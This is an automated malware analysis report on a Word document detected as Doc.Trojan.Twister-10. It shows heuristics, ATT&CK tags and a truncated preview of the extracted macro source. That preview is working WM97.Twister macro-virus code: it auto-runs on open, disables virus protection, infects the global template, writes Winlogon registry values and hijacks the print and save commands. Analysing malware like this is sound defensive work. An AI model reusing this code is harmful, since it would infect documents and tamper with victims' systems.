MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a legacy WordBasic AutoOpen macro, identified by multiple heuristics as a critical finding. The AutoOpen macro is designed to execute automatically when the document is opened, and it attempts to export its own code to 'C:\Progra~1\TSR32.vxd'. This suggests the document is a loader for a secondary payload, likely delivered via spearphishing.
Heuristics 5
-
ClamAV: Doc.Trojan.Twister-10 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Twister-10
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19946 bytes |
SHA-256: 34c2c598292b768cc823b7811949fe0baba7f307da75f85a4cc4c2b371795f6d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Twister"
Function InstNor()
For x = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(x).Name = "Twister" Then
InstNor = True
End If
Next x
End Function
Function InstDok()
For x = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(x).Name = "Twister" Then
InstDok = True
End If
Next x
End Function
Sub AutoOpen()
On Error Resume Next
WordBasic.DisableAutoMacros
Application.ScreenUpdating = False: Application.ShowVisualBasicEditor = False
Application.Caption = "Micrøsøft Wørd - TwIsTeR"
Options.VirusProtection = False: Options.SaveNormalPrompt = False
Options.AllowFastSave = False: Options.BlueScreen = True
Assistant.Visible = True
Assistant.Animation = msoAnimationThinking
With Assistant.NewBalloon
.Heading = "This is WM97.Twister"
.Text = "Autor: Zerø|<LzØ>"
.Show
End With
Assistant.Visible = False
FN$ = "C:\Progra~1\TSR32.vxd"
Application.VBE.ActiveVBProject.VBComponents.Item("Twister").Export FN$
Infection
Twister
End Sub
Sub DateiDrucken()
Infection
Twister
Application.ScreenUpdating = False
Randomize
Zu$ = Int((Rnd) * 5 + 1)
Select Case Zu$
Case 1
Font$ = "Windings"
Case 2
Font$ = "Bookman Old Style"
Case 3
Font$ = "Arial"
Case 4
Font$ = "Times New Roman"
Case 5
Font$ = "System"
End Select
Selection.WholeStory
FontV$ = Selection.Font.Name
Size$ = Selection.Font.Size
Selection.Font.Name = Font$
Selection.Font.Size = Int((Rnd) * 100 + 1)
Dialogs(wdDialogFilePrint).Show
Selection.Font.Name = FonfV$
Selection.Font.Size = Size$
End Sub
Sub Infection()
On Error Resume Next
If InstNor = False Then
NormalTemplate.VBProject.VBComponents.Import FN$
End If
If InstDok = False Then
ActiveDocument.VBProject.VBComponents.Import FN$
End If
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon", "LegalNoticeCaption") = "This is WM97.Twister"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon", "LegalNoticeText") = "Autor: Zerø|<LzØ>"
End Sub
Sub DateiSpeichernUnter()
CheckLines
Infection
Twister
Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub DateiSpeichern()
Infection
Twister
ActiveDocument.SaveAs WordBasic.[Filename$]
End Sub
Sub CheckLines()
Lines$ = Application.VBE.ActiveCodePane.CodeModule.CountOfLines
If Lines$ <> 171 Then
Infection
End If
End Sub
Sub DateiDruckenStandard()
Twister
Infection
Application.ScreenUpdating = False
WordBasic.EndOfDocument
Selection.TypeParagraph
Selection.TypeParagraph
Selection.ParagraphFormat.Alignment = wdAlignParagraphCenter
Selection.Font.ColorIndex = wdGray25
Selection.Font.Name = "Times New Roman"
Selection.Font.Size = 20
WordBasic.Insert "This is WM97.Twister"
ActiveDocument.PrintOut
End Sub
Sub DateiDokVorlagen()
Twister
Infection
MsgBox "Die zum Ausführen des Programms benötigte Datei (Word32.vxd) wurde nicht gefunden!", vbCritical, "Word Fehler:"
End Sub
Sub AnsichtCode()
Twister
Infection
MsgBox "Die zum Ausführen des Programms benötigte Datei (Word32.vxd) wurde nicht gefunden!", vbCritical, "Word Fehler:"
End Sub
Sub AnsichtVBCode()
Infection
Twister
MsgBox "Die zum Ausführen des Programms benötigte Datei (Word32.vxd) wurde nicht gefunden!", vbCritical, "Word Fehler:"
End Sub
Sub ExtrasMakro()
Infection
Twister
'Thanxs to Jack Twoflower for this great Code :}
Dim x
ReDim Combobox1__$(0)
Combobox1__$(0) = ""
ReDim Textbox1__$(0)
Textbox1__$(0) = ""
ReDim Droplistbox2__$(0)
Droplistbox2__$(0) = "Normal.dot (Globale Dokumentvorlage)"
WordBasic.BeginDialog 620, 280, "Makros"
WordBasic.Text 7, 6, 93, 13, "&Makroname:", "Text3"
WordBasic.ComboBox 7, 23, 4
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.